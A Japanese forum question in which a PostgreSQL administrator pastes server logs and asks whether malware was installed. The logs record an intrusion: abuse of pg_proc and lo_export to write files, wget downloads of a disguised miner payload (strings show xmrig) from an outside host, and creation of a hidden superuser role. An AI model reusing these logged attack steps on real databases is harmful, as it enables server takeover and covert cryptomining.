お世話になります。postgresに怪しいログがあり、
何かわかる方がいたら教えて頂けないかと。。。
ファイルをダウンロードまでされていて、これはウイルスでしょうか?
ファイルを探しましたが何処にあるかわかりませんでした。
下の部分のあとのログは、最後のdelete分がずっと続いています。
コネクション数が上限に達していたため気がつきました。
宜しくお願いいたします。
環境は
centOS6.9
PostgreSQL9.2
です。
ERROR: large object 3424356684 does not exist
STATEMENT: select lo_unlink(3424356684)
ERROR: function lo_export(bigint, unknown) does not exist at character 8
HINT: No function matches the given name and argument types. You might need to add explicit type casts.
STATEMENT: select lo_export(3424356684, './tmp3424356684');
ERROR: function obj3424356684(bigint, unknown) does not exist at character 8
HINT: No function matches the given name and argument types. You might need to add explicit type casts.
STATEMENT: select obj3424356684(3424356684, './tmp3424356684');
ERROR: column "protrftypes" of relation "pg_proc" does not exist at character 274
STATEMENT: insert into pg_proc (proname ,pronamespace,proowner,prolang,procost,prorows,provariadic ,protransform,proisagg,proiswindow,prosecdef,proleakproof,proisstrict,proretset,provolatile,pronargs,pronargdefaults,prorettype,proargtypes,proallargtypes,proargmodes,proargdefaults,protrftypes,prosrc,probin,proconfig,proacl,proparallel) values ('obj3424356684',11,10,12,1,0,0 ,'-','f','f','f','f','f','f','v',2,0,'23','26 25',null,null,null,null,'lo_export',null,null,null,'f')
ERROR: column "proparallel" of relation "pg_proc" does not exist at character 305
STATEMENT: insert into pg_proc (proname ,pronamespace,proowner,prolang,procost,prorows,provariadic ,protransform,proisagg,proiswindow,prosecdef,proleakproof,proisstrict,proretset,provolatile,pronargs,pronargdefaults,prorettype,proargtypes,proallargtypes,proargmodes,proargdefaults,prosrc,probin,proconfig,proacl,proparallel) values ('obj3424356684',11,10,12,1,0,0 ,'-','f','f','f','f','f','f','v',2,0,'23','26 25',null,null,null,'lo_export',null,null,null,'f');
sh: lshw: command not found
--2018-04-27 10:26:46-- http://img1.imagehousing.com/0/baby-942650.png
Resolving img1.imagehousing.com... 104.27.180.36, 104.27.181.36, 2400:cb00:2048:1::681b:b524, ...
Connecting to img1.imagehousing.com|104.27.180.36|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1571 (1.5K) [image/png]
Saving to: “./conf1.dat”
0K . 100% 247M=0s
2018-04-27 10:26:46 (247 MB/s) - “./conf1.dat” saved [1571/1571]
896+0 records in
896+0 records out
896 bytes (896 B) copied, 0.00186276 s, 481 kB/s
chmod: cannot access `./x3424356684': No such file or directory
--2018-04-27 10:26:47-- http://img1.imagehousing.com/0/cat-497532.png
Resolving img1.imagehousing.com... 104.27.180.36, 104.27.181.36, 2400:cb00:2048:1::681b:b524, ...
Connecting to img1.imagehousing.com|104.27.180.36|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 840464 (821K) [image/png]
Saving to: “qtikgczj.jpg”
0K .......... .......... .......... .......... .......... 6% 16.8M 0s 50K .......... .......... .......... .......... .......... 12% 21.1M 0s
100K .......... .......... .......... .......... .......... 18% 22.9M 0s
150K .......... .......... .......... .......... .......... 24% 26.6M 0s
200K .......... .......... .......... .......... .......... 30% 20.7M 0s
250K .......... .......... .......... .......... .......... 36% 28.5M 0s
300K .......... .......... .......... .......... .......... 42% 32.9M 0s
350K .......... .......... .......... .......... .......... 48% 29.8M 0s
400K .......... .......... .......... .......... .......... 54% 32.1M 0s
450K .......... .......... .......... .......... .......... 60% 38.5M 0s
500K .......... .......... .......... .......... .......... 67% 38.2M 0s
550K .......... .......... .......... .......... .......... 73% 39.0M 0s
600K .......... .......... .......... .......... .......... 79% 42.0M 0s
650K .......... .......... .......... .......... .......... 85% 38.2M 0s
700K .......... .......... .......... .......... .......... 91% 37.6M 0s
750K .......... .......... .......... .......... .......... 97% 43.3M 0s
800K .......... .......... 100% 51.6M=0.03s
2018-04-27 10:26:48 (29.7 MB/s) - “qtikgczj.jpg” saved [840464/840464]
819808+0 records in
819808+0 records out
819808 bytes (820 kB) copied, 1.47717 s, 555 kB/s
./x3424356684: /lib64/libc.so.6: version `GLIBC_2.14' not found (required by ./x3424356684)
ERROR: role "s3b09233" already exists
STATEMENT: CREATE ROLE s3b09233 LOGIN ENCRYPTED PASSWORD 'md51351dbb7fe95c1f277282bc842cb3d6b' SUPERUSER CREATEDB CREATEROLE REPLICATION VALID UNTIL 'infinity';
ERROR: role "s3b09233" already exists
STATEMENT: CREATE ROLE s3b09233 LOGIN ENCRYPTED PASSWORD 'md51351dbb7fe95c1f277282bc842cb3d6b' SUPERUSER CREATEDB CREATEROLE VALID UNTIL 'infinity';
ERROR: permission denied for relation pg_proc
STATEMENT: delete from pg_proc where ( prosrc = 'lo_export' OR prosrc = 'sys_eval' ) AND proname <> 'obj3424356684' and proname <> 'fun2364340837';
上記jpgファイルを自分でダウンロードして、テキストで開くと、コマンドっぽいものやら、logっぽい文章がかなりありました。
また、上記logについてもPostgreSQLのroleを作成しようとしている部分があるなどが気になります。
以下は一部抜粋です。
xmrig async check fs_event fs_poll handle idle prepare tcp timer tty udp signal <unknown> [%c%c%c] %-8s %p I- A- R- Unknown system error Unknown system error %d E2BIG EACCES EADDRINUSE EADDRNOTAVAIL EAFNOSUPPORT EAGAIN EAI_ADDRFAMILY EAI_AGAIN EAI_BADFLAGS EAI_BADHINTS EAI_CANCELED EAI_FAIL EAI_FAMILY EAI_MEMORY EAI_NODATA EAI_NONAME EAI_OVERFLOW EAI_PROTOCOL EAI_SERVICE EAI_SOCKTYPE EALREADY EBADF EBUSY ECANCELED ECHARSET ECONNABORTED ECONNREFUSED ECONNRESET EDESTADDRREQ EEXIST EFAULT EFBIG EHOSTUNREACH EINTR EINVAL EISCONN EISDIR ELOOP EMFILE EMSGSIZE ENAMETOOLONG ENETDOWN ENETUNREACH ENFILE ENOBUFS ENODEV ENOENT ENOMEM ENONET ENOPROTOOPT ENOSPC ENOSYS ENOTCONN ENOTDIR ENOTEMPTY ENOTSOCK ENOTSUP EPERM EPIPE EPROTO EPROTONOSUPPORT EPROTOTYPE ERANGE EROFS ESHUTDOWN ESPIPE ESRCH ETIMEDOUT ETXTBSY EXDEV UNKNOWN EOF ENXIO EMLINK EHOSTDOWN EREMOTEIO ENOTTY argument list too long permission denied address already in use address not available address family not supported temporary failure bad ai_flags value invalid value for hints request canceled permanent failure ai_family not supported out of memory no address unknown node or service argument buffer overflow resolved protocol is unknown socket type not supported bad file descriptor resource busy or locked operation canceled invalid Unicode character connection refused connection reset by peer destination address required file already exists file too large host is unreachable interrupted system call invalid argument i/o error socket is already connected too many open files message too long name too long network is down network is unreachable file table overflow no buffer space available no such device no such file or directory not enough memory machine is not on the network protocol not available no space left on device function not implemented socket is not connected not a directory directory not empty operation not permitted broken pipe protocol error protocol not supported result too large read-only file system invalid seek no such process connection timed out text file is busy unknown error end of file no such device or address too many links host is down remote I/O error src/uv-common.c err == 0 ョ・(ュ・クャ・ョ・・隴・リュ・ネュ・クュ・ィュ・亊・渥・xュ・hュ・Xュ・Hュ・8ュ・ャニ・Lニ・\ニ・ャニ・lニ・ャニ・|ニ・ャニ・姑・ャニ・愴・ャニ・4ニ・ @ タ P @ ク ( x ・ h
x x ・ ・ ・ ・ 8 リ ・ uv_loop_delete resource temporarily unavailable service not available for socket type connection already in progress software caused connection abort bad address in system call argument illegal operation on a
回答3件
あなたの回答
tips
プレビュー